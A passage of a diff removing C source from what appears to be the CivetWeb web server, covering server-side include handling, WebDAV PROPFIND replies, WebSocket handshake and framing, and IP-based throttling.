-              const char *path,
-              struct mg_file *filep,
-              int include_level)
-{
-	char buf[MG_BUF_LEN];
-	int ch, offset, len, in_tag, in_ssi_tag;
-
-	if (include_level > 10) {
-		mg_cry(conn, "SSI #include level is too deep (%s)", path);
-		return;
-	}
-
-	in_tag = in_ssi_tag = len = offset = 0;
-
-	/* Read file, byte by byte, and look for SSI include tags */
-	while ((ch = mg_fgetc(filep, offset++)) != EOF) {
-
-		if (in_tag) {
-			/* We are in a tag, either SSI tag or html tag */
-
-			if (ch == '>') {
-				/* Tag is closing */
-				buf[len++] = '>';
-
-				if (in_ssi_tag) {
-					/* Handle SSI tag */
-					buf[len] = 0;
-
-					if (!memcmp(buf + 5, "include", 7)) {
-						do_ssi_include(conn, path, buf + 12, include_level + 1);
-#if !defined(NO_POPEN)
-					} else if (!memcmp(buf + 5, "exec", 4)) {
-						do_ssi_exec(conn, buf + 9);
-#endif /* !NO_POPEN */
-					} else {
-						mg_cry(conn,
-						       "%s: unknown SSI "
-						       "command: \"%s\"",
-						       path,
-						       buf);
-					}
-					len = 0;
-					in_ssi_tag = in_tag = 0;
-
-				} else {
-					/* Not an SSI tag */
-					/* Flush buffer */
-					(void)mg_write(conn, buf, (size_t)len);
-					len = 0;
-					in_tag = 0;
-				}
-
-			} else {
-				/* Tag is still open */
-				buf[len++] = (char)(ch & 0xff);
-
-				if ((len == 5) && !memcmp(buf, "<!--#", 5)) {
-					/* All SSI tags start with <!--# */
-					in_ssi_tag = 1;
-				}
-
-				if ((len + 2) > (int)sizeof(buf)) {
-					/* Tag to long for buffer */
-					mg_cry(conn, "%s: tag is too large", path);
-					return;
-				}
-			}
-
-		} else {
-			/* We are not in a tag yet. */
-
-			if (ch == '<') {
-				/* Tag is opening */
-				in_tag = 1;
-				/* Flush current buffer */
-				(void)mg_write(conn, buf, (size_t)len);
-				/* Store the < */
-				len = 1;
-				buf[0] = '<';
-
-			} else {
-				/* No Tag */
-				/* Add data to buffer */
-				buf[len++] = (char)(ch & 0xff);
-				/* Flush if buffer is full */
-				if (len == (int)sizeof(buf)) {
-					mg_write(conn, buf, (size_t)len);
-					len = 0;
-				}
-			}
-		}
-	}
-
-	/* Send the rest of buffered data */
-	if (len > 0) {
-		mg_write(conn, buf, (size_t)len);
-	}
-}
-
-
-static void
-handle_ssi_file_request(struct mg_connection *conn,
-                        const char *path,
-                        struct mg_file *filep)
-{
-	char date[64];
-	time_t curtime = time(NULL);
-	const char *cors1, *cors2, *cors3;
-
-	if ((conn == NULL) || (path == NULL) || (filep == NULL)) {
-		return;
-	}
-
-	if (mg_get_header(conn, "Origin")) {
-		/* Cross-origin resource sharing (CORS). */
-		cors1 = "Access-Control-Allow-Origin: ";
-		cors2 = conn->ctx->config[ACCESS_CONTROL_ALLOW_ORIGIN];
-		cors3 = "\r\n";
-	} else {
-		cors1 = cors2 = cors3 = "";
-	}
-
-	if (!mg_fopen(conn, path, MG_FOPEN_MODE_READ, filep)) {
-		/* File exists (precondition for calling this function),
-		 * but can not be opened by the server. */
-		mg_send_http_error(conn,
-		                   500,
-		                   "Error: Cannot read file\nfopen(%s): %s",
-		                   path,
-		                   strerror(ERRNO));
-	} else {
-		conn->must_close = 1;
-		gmt_time_string(date, sizeof(date), &curtime);
-		fclose_on_exec(&filep->access, conn);
-		mg_printf(conn, "HTTP/1.1 200 OK\r\n");
-		send_no_cache_header(conn);
-		send_additional_header(conn);
-		mg_printf(conn,
-		          "%s%s%s"
-		          "Date: %s\r\n"
-		          "Content-Type: text/html\r\n"
-		          "Connection: %s\r\n\r\n",
-		          cors1,
-		          cors2,
-		          cors3,
-		          date,
-		          suggest_connection_header(conn));
-		send_ssi_file(conn, path, filep, 0);
-		(void)mg_fclose(&filep->access); /* Ignore errors for readonly files */
-	}
-}
-
-
-#if !defined(NO_FILES)
-static void
-send_options(struct mg_connection *conn)
-{
-	char date[64];
-	time_t curtime = time(NULL);
-
-	if (!conn) {
-		return;
-	}
-
-	conn->status_code = 200;
-	conn->must_close = 1;
-	gmt_time_string(date, sizeof(date), &curtime);
-
-	/* We do not set a "Cache-Control" header here, but leave the default.
-	 * Since browsers do not send an OPTIONS request, we can not test the
-	 * effect anyway. */
-	mg_printf(conn,
-	          "HTTP/1.1 200 OK\r\n"
-	          "Date: %s\r\n"
-	          "Connection: %s\r\n"
-	          "Allow: GET, POST, HEAD, CONNECT, PUT, DELETE, OPTIONS, "
-	          "PROPFIND, MKCOL\r\n"
-	          "DAV: 1\r\n",
-	          date,
-	          suggest_connection_header(conn));
-	send_additional_header(conn);
-	mg_printf(conn, "\r\n");
-}
-
-
-/* Writes PROPFIND properties for a collection element */
-static void
-print_props(struct mg_connection *conn,
-            const char *uri,
-            struct mg_file_stat *filep)
-{
-	char mtime[64];
-
-	if ((conn == NULL) || (uri == NULL) || (filep == NULL)) {
-		return;
-	}
-
-	gmt_time_string(mtime, sizeof(mtime), &filep->last_modified);
-	mg_printf(conn,
-	          "<d:response>"
-	          "<d:href>%s</d:href>"
-	          "<d:propstat>"
-	          "<d:prop>"
-	          "<d:resourcetype>%s</d:resourcetype>"
-	          "<d:getcontentlength>%" INT64_FMT "</d:getcontentlength>"
-	          "<d:getlastmodified>%s</d:getlastmodified>"
-	          "</d:prop>"
-	          "<d:status>HTTP/1.1 200 OK</d:status>"
-	          "</d:propstat>"
-	          "</d:response>\n",
-	          uri,
-	          filep->is_directory ? "<d:collection/>" : "",
-	          filep->size,
-	          mtime);
-}
-
-
-static int
-print_dav_dir_entry(struct de *de, void *data)
-{
-	char href[PATH_MAX];
-	int truncated;
-
-	struct mg_connection *conn = (struct mg_connection *)data;
-	if (!de || !conn) {
-		return -1;
-	}
-	mg_snprintf(conn,
-	            &truncated,
-	            href,
-	            sizeof(href),
-	            "%s%s",
-	            conn->request_info.local_uri,
-	            de->file_name);
-
-	if (!truncated) {
-		size_t href_encoded_size;
-		char *href_encoded;
-
-		href_encoded_size = PATH_MAX * 3; /* worst case */
-		href_encoded = (char *)mg_malloc(href_encoded_size);
-		if (href_encoded == NULL) {
-			return -1;
-		}
-		mg_url_encode(href, href_encoded, href_encoded_size);
-		print_props(conn, href_encoded, &de->file);
-		mg_free(href_encoded);
-	}
-
-	return 0;
-}
-
-
-static void
-handle_propfind(struct mg_connection *conn,
-                const char *path,
-                struct mg_file_stat *filep)
-{
-	const char *depth = mg_get_header(conn, "Depth");
-	char date[64];
-	time_t curtime = time(NULL);
-
-	gmt_time_string(date, sizeof(date), &curtime);
-
-	if (!conn || !path || !filep || !conn->ctx) {
-		return;
-	}
-
-	conn->must_close = 1;
-	conn->status_code = 207;
-	mg_printf(conn,
-	          "HTTP/1.1 207 Multi-Status\r\n"
-	          "Date: %s\r\n",
-	          date);
-	send_static_cache_header(conn);
-	send_additional_header(conn);
-	mg_printf(conn,
-	          "Connection: %s\r\n"
-	          "Content-Type: text/xml; charset=utf-8\r\n\r\n",
-	          suggest_connection_header(conn));
-
-	mg_printf(conn,
-	          "<?xml version=\"1.0\" encoding=\"utf-8\"?>"
-	          "<d:multistatus xmlns:d='DAV:'>\n");
-
-	/* Print properties for the requested resource itself */
-	print_props(conn, conn->request_info.local_uri, filep);
-
-	/* If it is a directory, print directory entries too if Depth is not 0
-	 */
-	if (filep && filep->is_directory
-	    && !mg_strcasecmp(conn->ctx->config[ENABLE_DIRECTORY_LISTING], "yes")
-	    && ((depth == NULL) || (strcmp(depth, "0") != 0))) {
-		scan_directory(conn, path, conn, &print_dav_dir_entry);
-	}
-
-	mg_printf(conn, "%s\n", "</d:multistatus>");
-}
-#endif
-
-void
-mg_lock_connection(struct mg_connection *conn)
-{
-	if (conn) {
-		(void)pthread_mutex_lock(&conn->mutex);
-	}
-}
-
-void
-mg_unlock_connection(struct mg_connection *conn)
-{
-	if (conn) {
-		(void)pthread_mutex_unlock(&conn->mutex);
-	}
-}
-
-void
-mg_lock_context(struct mg_context *ctx)
-{
-	if (ctx) {
-		(void)pthread_mutex_lock(&ctx->nonce_mutex);
-	}
-}
-
-void
-mg_unlock_context(struct mg_context *ctx)
-{
-	if (ctx) {
-		(void)pthread_mutex_unlock(&ctx->nonce_mutex);
-	}
-}
-
-#if defined(USE_TIMERS)
-#define TIMER_API static
-#include "timer.inl"
-#endif /* USE_TIMERS */
-
-#ifdef USE_LUA
-#include "mod_lua.inl"
-#endif /* USE_LUA */
-
-#ifdef USE_DUKTAPE
-#include "mod_duktape.inl"
-#endif /* USE_DUKTAPE */
-
-#if defined(USE_WEBSOCKET)
-
-#if !defined(NO_SSL_DL)
-#define SHA_API static
-#include "sha1.inl"
-#endif
-
-static int
-send_websocket_handshake(struct mg_connection *conn, const char *websock_key)
-{
-	static const char *magic = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11";
-	char buf[100], sha[20], b64_sha[sizeof(sha) * 2];
-	SHA_CTX sha_ctx;
-	int truncated;
-
-	/* Calculate Sec-WebSocket-Accept reply from Sec-WebSocket-Key. */
-	mg_snprintf(conn, &truncated, buf, sizeof(buf), "%s%s", websock_key, magic);
-	if (truncated) {
-		conn->must_close = 1;
-		return 0;
-	}
-
-	SHA1_Init(&sha_ctx);
-	SHA1_Update(&sha_ctx, (unsigned char *)buf, (uint32_t)strlen(buf));
-	SHA1_Final((unsigned char *)sha, &sha_ctx);
-	base64_encode((unsigned char *)sha, sizeof(sha), b64_sha);
-	mg_printf(conn,
-	          "HTTP/1.1 101 Switching Protocols\r\n"
-	          "Upgrade: websocket\r\n"
-	          "Connection: Upgrade\r\n"
-	          "Sec-WebSocket-Accept: %s\r\n",
-	          b64_sha);
-	if (conn->request_info.acceptedWebSocketSubprotocol) {
-		mg_printf(conn,
-		          "Sec-WebSocket-Protocol: %s\r\n\r\n",
-		          conn->request_info.acceptedWebSocketSubprotocol);
-	} else {
-		mg_printf(conn, "%s", "\r\n");
-	}
-
-	return 1;
-}
-
-
-static void
-read_websocket(struct mg_connection *conn,
-               mg_websocket_data_handler ws_data_handler,
-               void *callback_data)
-{
-	/* Pointer to the beginning of the portion of the incoming websocket
-	 * message queue.
-	 * The original websocket upgrade request is never removed, so the queue
-	 * begins after it. */
-	unsigned char *buf = (unsigned char *)conn->buf + conn->request_len;
-	int n, error, exit_by_callback;
-
-	/* body_len is the length of the entire queue in bytes
-	 * len is the length of the current message
-	 * data_len is the length of the current message's data payload
-	 * header_len is the length of the current message's header */
-	size_t i, len, mask_len = 0, header_len, body_len;
-	uint64_t data_len = 0;
-
-	/* "The masking key is a 32-bit value chosen at random by the client."
-	 * http://tools.ietf.org/html/draft-ietf-hybi-thewebsocketprotocol-17#section-5
-	*/
-	unsigned char mask[4];
-
-	/* data points to the place where the message is stored when passed to
-	 * the
-	 * websocket_data callback.  This is either mem on the stack, or a
-	 * dynamically allocated buffer if it is too large. */
-	unsigned char mem[4096];
-	unsigned char mop; /* mask flag and opcode */
-	double timeout = -1.0;
-
-	if (conn->ctx->config[WEBSOCKET_TIMEOUT]) {
-		timeout = atoi(conn->ctx->config[WEBSOCKET_TIMEOUT]) / 1000.0;
-	}
-	if ((timeout <= 0.0) && (conn->ctx->config[REQUEST_TIMEOUT])) {
-		timeout = atoi(conn->ctx->config[REQUEST_TIMEOUT]) / 1000.0;
-	}
-
-	conn->in_websocket_handling = 1;
-	mg_set_thread_name("wsock");
-
-	/* Loop continuously, reading messages from the socket, invoking the
-	 * callback, and waiting repeatedly until an error occurs. */
-	while (!conn->ctx->stop_flag && !conn->must_close) {
-		header_len = 0;
-		assert(conn->data_len >= conn->request_len);
-		if ((body_len = (size_t)(conn->data_len - conn->request_len)) >= 2) {
-			len = buf[1] & 127;
-			mask_len = (buf[1] & 128) ? 4 : 0;
-			if ((len < 126) && (body_len >= mask_len)) {
-				/* inline 7-bit length field */
-				data_len = len;
-				header_len = 2 + mask_len;
-			} else if ((len == 126) && (body_len >= (4 + mask_len))) {
-				/* 16-bit length field */
-				header_len = 4 + mask_len;
-				data_len = ((((size_t)buf[2]) << 8) + buf[3]);
-			} else if (body_len >= (10 + mask_len)) {
-				/* 64-bit length field */
-				uint32_t l1, l2;
-				memcpy(&l1, &buf[2], 4); /* Use memcpy for alignment */
-				memcpy(&l2, &buf[6], 4);
-				header_len = 10 + mask_len;
-				data_len = (((uint64_t)ntohl(l1)) << 32) + ntohl(l2);
-
-				if (data_len > (uint64_t)0x7FFF0000ul) {
-					/* no can do */
-					mg_cry(conn, "websocket out of memory; closing connection");
-					break;
-				}
-			}
-		}
-
-		if ((header_len > 0) && (body_len >= header_len)) {
-			/* Allocate space to hold websocket payload */
-			unsigned char *data = mem;
-
-			if ((size_t)data_len > (size_t)sizeof(mem)) {
-				data =
-				    (unsigned char *)mg_malloc_ctx((size_t)data_len, conn->ctx);
-				if (data == NULL) {
-					/* Allocation failed, exit the loop and then close the
-					 * connection */
-					mg_cry(conn, "websocket out of memory; closing connection");
-					break;
-				}
-			}
-
-			/* Copy the mask before we shift the queue and destroy it */
-			if (mask_len > 0) {
-				memcpy(mask, buf + header_len - mask_len, sizeof(mask));
-			} else {
-				memset(mask, 0, sizeof(mask));
-			}
-
-			/* Read frame payload from the first message in the queue into
-			 * data and advance the queue by moving the memory in place. */
-			assert(body_len >= header_len);
-			if (data_len + (uint64_t)header_len > (uint64_t)body_len) {
-				mop = buf[0]; /* current mask and opcode */
-				/* Overflow case */
-				len = body_len - header_len;
-				memcpy(data, buf + header_len, len);
-				error = 0;
-				while ((uint64_t)len < data_len) {
-					n = pull_inner(NULL,
-					               conn,
-					               (char *)(data + len),
-					               (int)(data_len - len),
-					               timeout);
-					if (n <= -2) {
-						error = 1;
-						break;
-					} else if (n > 0) {
-						len += (size_t)n;
-					} else {
-						/* Timeout: should retry */
-						/* TODO: retry condition */
-					}
-				}
-				if (error) {
-					mg_cry(conn, "Websocket pull failed; closing connection");
-					if (data != mem) {
-						mg_free(data);
-					}
-					break;
-				}
-
-				conn->data_len = conn->request_len;
-
-			} else {
-
-				mop = buf[0]; /* current mask and opcode, overwritten by
-				               * memmove() */
-
-				/* Length of the message being read at the front of the
-				 * queue. Cast to 31 bit is OK, since we limited
-				 * data_len before. */
-				len = (size_t)data_len + header_len;
-
-				/* Copy the data payload into the data pointer for the
-				 * callback. Cast to 31 bit is OK, since we
-				 * limited data_len */
-				memcpy(data, buf + header_len, (size_t)data_len);
-
-				/* Move the queue forward len bytes */
-				memmove(buf, buf + len, body_len - len);
-
-				/* Mark the queue as advanced */
-				conn->data_len -= (int)len;
-			}
-
-			/* Apply mask if necessary */
-			if (mask_len > 0) {
-				for (i = 0; i < (size_t)data_len; i++) {
-					data[i] ^= mask[i & 3];
-				}
-			}
-
-			/* Exit the loop if callback signals to exit (server side),
-			 * or "connection close" opcode received (client side). */
-			exit_by_callback = 0;
-			if ((ws_data_handler != NULL)
-			    && !ws_data_handler(conn,
-			                        mop,
-			                        (char *)data,
-			                        (size_t)data_len,
-			                        callback_data)) {
-				exit_by_callback = 1;
-			}
-
-			if (data != mem) {
-				mg_free(data);
-			}
-
-			if (exit_by_callback
-			    || ((mop & 0xf) == WEBSOCKET_OPCODE_CONNECTION_CLOSE)) {
-				/* Opcode == 8, connection close */
-				break;
-			}
-
-			/* Not breaking the loop, process next websocket frame. */
-		} else {
-			/* Read from the socket into the next available location in the
-			 * message queue. */
-			n = pull_inner(NULL,
-			               conn,
-			               conn->buf + conn->data_len,
-			               conn->buf_size - conn->data_len,
-			               timeout);
-			if (n <= -2) {
-				/* Error, no bytes read */
-				break;
-			}
-			if (n > 0) {
-				conn->data_len += n;
-			} else {
-				/* Timeout: should retry */
-				/* TODO: get timeout def */
-			}
-		}
-	}
-
-	mg_set_thread_name("worker");
-	conn->in_websocket_handling = 0;
-}
-
-
-static int
-mg_websocket_write_exec(struct mg_connection *conn,
-                        int opcode,
-                        const char *data,
-                        size_t dataLen,
-                        uint32_t masking_key)
-{
-	unsigned char header[14];
-	size_t headerLen = 1;
-
-	int retval = -1;
-
-#if defined(__GNUC__) || defined(__MINGW32__)
-/* Disable spurious conversion warning for GCC */
-#pragma GCC diagnostic push
-#pragma GCC diagnostic ignored "-Wconversion"
-#endif
-
-	header[0] = 0x80u | (unsigned char)((unsigned)opcode & 0xf);
-
-#if defined(__GNUC__) || defined(__MINGW32__)
-#pragma GCC diagnostic pop
-#endif
-
-	/* Frame format: http://tools.ietf.org/html/rfc6455#section-5.2 */
-	if (dataLen < 126) {
-		/* inline 7-bit length field */
-		header[1] = (unsigned char)dataLen;
-		headerLen = 2;
-	} else if (dataLen <= 0xFFFF) {
-		/* 16-bit length field */
-		uint16_t len = htons((uint16_t)dataLen);
-		header[1] = 126;
-		memcpy(header + 2, &len, 2);
-		headerLen = 4;
-	} else {
-		/* 64-bit length field */
-		uint32_t len1 = htonl((uint32_t)((uint64_t)dataLen >> 32));
-		uint32_t len2 = htonl((uint32_t)(dataLen & 0xFFFFFFFFu));
-		header[1] = 127;
-		memcpy(header + 2, &len1, 4);
-		memcpy(header + 6, &len2, 4);
-		headerLen = 10;
-	}
-
-	if (masking_key) {
-		/* add mask */
-		header[1] |= 0x80;
-		memcpy(header + headerLen, &masking_key, 4);
-		headerLen += 4;
-	}
-
-
-	/* Note that POSIX/Winsock's send() is threadsafe
-	 * http://stackoverflow.com/questions/1981372/are-parallel-calls-to-send-recv-on-the-same-socket-valid
-	 * but mongoose's mg_printf/mg_write is not (because of the loop in
-	 * push(), although that is only a problem if the packet is large or
-	 * outgoing buffer is full). */
-
-	/* TODO: Check if this lock should be moved to user land.
-	 * Currently the server sets this lock for websockets, but
-	 * not for any other connection. It must be set for every
-	 * conn read/written by more than one thread, no matter if
-	 * it is a websocket or regular connection. */
-	(void)mg_lock_connection(conn);
-
-	retval = mg_write(conn, header, headerLen);
-	if (dataLen > 0) {
-		retval = mg_write(conn, data, dataLen);
-	}
-
-	/* TODO: Remove this unlock as well, when lock is moved. */
-	mg_unlock_connection(conn);
-
-	return retval;
-}
-
-int
-mg_websocket_write(struct mg_connection *conn,
-                   int opcode,
-                   const char *data,
-                   size_t dataLen)
-{
-	return mg_websocket_write_exec(conn, opcode, data, dataLen, 0);
-}
-
-
-static void
-mask_data(const char *in, size_t in_len, uint32_t masking_key, char *out)
-{
-	size_t i = 0;
-
-	i = 0;
-	if ((in_len > 3) && ((ptrdiff_t)in % 4) == 0) {
-		/* Convert in 32 bit words, if data is 4 byte aligned */
-		while (i < (in_len - 3)) {
-			*(uint32_t *)(void *)(out + i) =
-			    *(uint32_t *)(void *)(in + i) ^ masking_key;
-			i += 4;
-		}
-	}
-	if (i != in_len) {
-		/* convert 1-3 remaining bytes if ((dataLen % 4) != 0)*/
-		while (i < in_len) {
-			*(uint8_t *)(void *)(out + i) =
-			    *(uint8_t *)(void *)(in + i)
-			    ^ *(((uint8_t *)&masking_key) + (i % 4));
-			i++;
-		}
-	}
-}
-
-
-int
-mg_websocket_client_write(struct mg_connection *conn,
-                          int opcode,
-                          const char *data,
-                          size_t dataLen)
-{
-	int retval = -1;
-	char *masked_data =
-	    (char *)mg_malloc_ctx(((dataLen + 7) / 4) * 4, conn->ctx);
-	uint32_t masking_key = (uint32_t)get_random();
-
-	if (masked_data == NULL) {
-		/* Return -1 in an error case */
-		mg_cry(conn,
-		       "Cannot allocate buffer for masked websocket response: "
-		       "Out of memory");
-		return -1;
-	}
-
-	mask_data(data, dataLen, masking_key, masked_data);
-
-	retval = mg_websocket_write_exec(
-	    conn, opcode, masked_data, dataLen, masking_key);
-	mg_free(masked_data);
-
-	return retval;
-}
-
-
-static void
-handle_websocket_request(struct mg_connection *conn,
-                         const char *path,
-                         int is_callback_resource,
-                         struct mg_websocket_subprotocols *subprotocols,
-                         mg_websocket_connect_handler ws_connect_handler,
-                         mg_websocket_ready_handler ws_ready_handler,
-                         mg_websocket_data_handler ws_data_handler,
-                         mg_websocket_close_handler ws_close_handler,
-                         void *cbData)
-{
-	const char *websock_key = mg_get_header(conn, "Sec-WebSocket-Key");
-	const char *version = mg_get_header(conn, "Sec-WebSocket-Version");
-	int lua_websock = 0;
-
-#if !defined(USE_LUA)
-	(void)path;
-#endif
-
-	/* Step 1: Check websocket protocol version. */
-	/* Step 1.1: Check Sec-WebSocket-Key. */
-	if (!websock_key) {
-		/* The RFC standard version (https://tools.ietf.org/html/rfc6455)
-		 * requires a Sec-WebSocket-Key header.
-		 */
-		/* It could be the hixie draft version
-		 * (http://tools.ietf.org/html/draft-hixie-thewebsocketprotocol-76).
-		 */
-		const char *key1 = mg_get_header(conn, "Sec-WebSocket-Key1");
-		const char *key2 = mg_get_header(conn, "Sec-WebSocket-Key2");
-		char key3[8];
-
-		if ((key1 != NULL) && (key2 != NULL)) {
-			/* This version uses 8 byte body data in a GET request */
-			conn->content_len = 8;
-			if (8 == mg_read(conn, key3, 8)) {
-				/* This is the hixie version */
-				mg_send_http_error(conn,
-				                   426,
-				                   "%s",
-				                   "Protocol upgrade to RFC 6455 required");
-				return;
-			}
-		}
-		/* This is an unknown version */
-		mg_send_http_error(conn, 400, "%s", "Malformed websocket request");
-		return;
-	}
-
-	/* Step 1.2: Check websocket protocol version. */
-	/* The RFC version (https://tools.ietf.org/html/rfc6455) is 13. */
-	if ((version == NULL) || (strcmp(version, "13") != 0)) {
-		/* Reject wrong versions */
-		mg_send_http_error(conn, 426, "%s", "Protocol upgrade required");
-		return;
-	}
-
-	/* Step 1.3: Could check for "Host", but we do not really nead this
-	 * value for anything, so just ignore it. */
-
-	/* Step 2: If a callback is responsible, call it. */
-	if (is_callback_resource) {
-		/* Step 2.1 check and select subprotocol */
-		const char *protocols[64]; // max 64 headers
-		int nbSubprotocolHeader = get_req_headers(&conn->request_info,
-		                                          "Sec-WebSocket-Protocol",
-		                                          protocols,
-		                                          64);
-		if ((nbSubprotocolHeader > 0) && subprotocols) {
-			int cnt = 0;
-			int idx;
-			unsigned long len;
-			const char *sep, *curSubProtocol,
-			    *acceptedWebSocketSubprotocol = NULL;
-
-
-			/* look for matching subprotocol */
-			do {
-				const char *protocol = protocols[cnt];
-
-				do {
-					sep = strchr(protocol, ',');
-					curSubProtocol = protocol;
-					len = sep ? (unsigned long)(sep - protocol)
-					          : (unsigned long)strlen(protocol);
-					while (sep && isspace(*++sep))
-						; // ignore leading whitespaces
-					protocol = sep;
-
-
-					for (idx = 0; idx < subprotocols->nb_subprotocols; idx++) {
-						if ((strlen(subprotocols->subprotocols[idx]) == len)
-						    && (strncmp(curSubProtocol,
-						                subprotocols->subprotocols[idx],
-						                len) == 0)) {
-							acceptedWebSocketSubprotocol =
-							    subprotocols->subprotocols[idx];
-							break;
-						}
-					}
-				} while (sep && !acceptedWebSocketSubprotocol);
-			} while (++cnt < nbSubprotocolHeader
-			         && !acceptedWebSocketSubprotocol);
-
-			conn->request_info.acceptedWebSocketSubprotocol =
-			    acceptedWebSocketSubprotocol;
-		} else if (nbSubprotocolHeader > 0) {
-			/* keep legacy behavior */
-			const char *protocol = protocols[0];
-
-			/* The protocol is a comma separated list of names. */
-			/* The server must only return one value from this list. */
-			/* First check if it is a list or just a single value. */
-			const char *sep = strrchr(protocol, ',');
-			if (sep == NULL) {
-				/* Just a single protocol -> accept it. */
-				conn->request_info.acceptedWebSocketSubprotocol = protocol;
-			} else {
-				/* Multiple protocols -> accept the last one. */
-				/* This is just a quick fix if the client offers multiple
-				 * protocols. The handler should have a list of accepted
-				 * protocols on his own
-				 * and use it to select one protocol among those the client
-				 * has
-				 * offered.
-				 */
-				while (isspace(*++sep)) {
-					; /* ignore leading whitespaces */
-				}
-				conn->request_info.acceptedWebSocketSubprotocol = sep;
-			}
-		}
-
-		if ((ws_connect_handler != NULL)
-		    && (ws_connect_handler(conn, cbData) != 0)) {
-			/* C callback has returned non-zero, do not proceed with
-			 * handshake.
-			 */
-			/* Note that C callbacks are no longer called when Lua is
-			 * responsible, so C can no longer filter callbacks for Lua. */
-			return;
-		}
-	}
-#if defined(USE_LUA)
-	/* Step 3: No callback. Check if Lua is responsible. */
-	else {
-		/* Step 3.1: Check if Lua is responsible. */
-		if (conn->ctx->config[LUA_WEBSOCKET_EXTENSIONS]) {
-			lua_websock =
-			    match_prefix(conn->ctx->config[LUA_WEBSOCKET_EXTENSIONS],
-			                 strlen(
-			                     conn->ctx->config[LUA_WEBSOCKET_EXTENSIONS]),
-			                 path);
-		}
-
-		if (lua_websock) {
-			/* Step 3.2: Lua is responsible: call it. */
-			conn->lua_websocket_state = lua_websocket_new(path, conn);
-			if (!conn->lua_websocket_state) {
-				/* Lua rejected the new client */
-				return;
-			}
-		}
-	}
-#endif
-
-	/* Step 4: Check if there is a responsible websocket handler. */
-	if (!is_callback_resource && !lua_websock) {
-		/* There is no callback, and Lua is not responsible either. */
-		/* Reply with a 404 Not Found. We are still at a standard
-		 * HTTP request here, before the websocket handshake, so
-		 * we can still send standard HTTP error replies. */
-		mg_send_http_error(conn, 404, "%s", "Not found");
-		return;
-	}
-
-	/* Step 5: The websocket connection has been accepted */
-	if (!send_websocket_handshake(conn, websock_key)) {
-		mg_send_http_error(conn, 500, "%s", "Websocket handshake failed");
-		return;
-	}
-
-	/* Step 6: Call the ready handler */
-	if (is_callback_resource) {
-		if (ws_ready_handler != NULL) {
-			ws_ready_handler(conn, cbData);
-		}
-#if defined(USE_LUA)
-	} else if (lua_websock) {
-		if (!lua_websocket_ready(conn, conn->lua_websocket_state)) {
-			/* the ready handler returned false */
-			return;
-		}
-#endif
-	}
-
-	/* Step 7: Enter the read loop */
-	if (is_callback_resource) {
-		read_websocket(conn, ws_data_handler, cbData);
-#if defined(USE_LUA)
-	} else if (lua_websock) {
-		read_websocket(conn, lua_websocket_data, conn->lua_websocket_state);
-#endif
-	}
-
-	/* Step 8: Call the close handler */
-	if (ws_close_handler) {
-		ws_close_handler(conn, cbData);
-	}
-}
-
-
-static int
-is_websocket_protocol(const struct mg_connection *conn)
-{
-	const char *upgrade, *connection;
-
-	/* A websocket protocoll has the following HTTP headers:
-	 *
-	 * Connection: Upgrade
-	 * Upgrade: Websocket
-	 */
-
-	upgrade = mg_get_header(conn, "Upgrade");
-	if (upgrade == NULL) {
-		return 0; /* fail early, don't waste time checking other header
-		           * fields
-		             */
-	}
-	if (!mg_strcasestr(upgrade, "websocket")) {
-		return 0;
-	}
-
-	connection = mg_get_header(conn, "Connection");
-	if (connection == NULL) {
-		return 0;
-	}
-	if (!mg_strcasestr(connection, "upgrade")) {
-		return 0;
-	}
-
-	/* The headers "Host", "Sec-WebSocket-Key", "Sec-WebSocket-Protocol" and
-	 * "Sec-WebSocket-Version" are also required.
-	 * Don't check them here, since even an unsupported websocket protocol
-	 * request still IS a websocket request (in contrast to a standard HTTP
-	 * request). It will fail later in handle_websocket_request.
-	 */
-
-	return 1;
-}
-#endif /* !USE_WEBSOCKET */
-
-
-static int
-isbyte(int n)
-{
-	return (n >= 0) && (n <= 255);
-}
-
-
-static int
-parse_net(const char *spec, uint32_t *net, uint32_t *mask)
-{
-	int n, a, b, c, d, slash = 32, len = 0;
-
-	if (((sscanf(spec, "%d.%d.%d.%d/%d%n", &a, &b, &c, &d, &slash, &n) == 5)
-	     || (sscanf(spec, "%d.%d.%d.%d%n", &a, &b, &c, &d, &n) == 4))
-	    && isbyte(a) && isbyte(b) && isbyte(c) && isbyte(d) && (slash >= 0)
-	    && (slash < 33)) {
-		len = n;
-		*net = ((uint32_t)a << 24) | ((uint32_t)b << 16) | ((uint32_t)c << 8)
-		       | (uint32_t)d;
-		*mask = slash ? (0xffffffffU << (32 - slash)) : 0;
-	}
-
-	return len;
-}
-
-
-static int
-set_throttle(const char *spec, uint32_t remote_ip, const char *uri)
-{
-	int throttle = 0;
-	struct vec vec, val;
-	uint32_t net, mask;
-	char mult;
-	double v;
-
-	while ((spec = next_option(spec, &vec, &val)) != NULL) {
-		mult = ',';
-		if ((val.ptr == NULL) || (sscanf(val.ptr, "%lf%c", &v, &mult) < 1)
-		    || (v < 0) || ((lowercase(&mult) != 'k')
-		                   && (lowercase(&mult) != 'm') && (mult != ','))) {
-			continue;
-		}
-		v *= (lowercase(&mult) == 'k')
-		         ? 1024
-		         : ((lowercase(&mult) == 'm') ? 1048576 : 1);
-		if (vec.len == 1 && vec.ptr[0] == '*') {
-			throttle = (int)v;
-		} else if (parse_net(vec.ptr, &net, &mask) > 0) {
-			if ((remote_ip & mask) == net) {
-				throttle = (int)v;
-			}
-		} else if (match_prefix(vec.ptr, vec.len, uri) > 0) {
-			throttle = (int)v;
-		}
-	}
-
-	return throttle;
-}
-
-
-static uint32_t
-get_remote_ip(const struct mg_connection *conn)
-{
-	if (!conn) {
-		return 0;
-	}
-	return ntohl(*(const uint32_t *)&conn->client.rsa.sin.sin_addr);
-}
-
-
-/* The mg_upload function is superseeded by mg_handle_form_request. */
-#include "handle_form.inl"
-
-
-#if defined(MG_LEGACY_INTERFACE)
-/* Implement the deprecated mg_upload function by calling the new
- * mg_handle_form_request function. While mg_upload could only handle
- * HTML forms sent as POST request in multipart/form-data format
- * containing only file input elements, mg_handle_form_request can
- * handle all form input elements and all standard request methods. */
-struct mg_upload_user_data {
-	struct mg_connection *conn;
-	const char *destination_dir;
-	int num_uploaded_files;
-};
-
-
-/* Helper function for deprecated mg_upload. */
-static int
-mg_upload_field_found(const char *key,
-                      const char *filename,
-                      char *path,
-                      size_t pathlen,
-                      void *user_data)
-{
-	int truncated = 0;
-	struct mg_upload_user_data *fud = (struct mg_upload_user_data *)user_data;
-	(void)key;
-
-	if (!filename) {
-		mg_cry(fud->conn, "%s: No filename set", __func__);
-		return FORM_FIELD_STORAGE_ABORT;
-	}
-	mg_snprintf(fud->conn,
-	            &truncated,
-	            path,
-	            pathlen - 1,
-	            "%s/%s",
-	            fud->destination_dir,
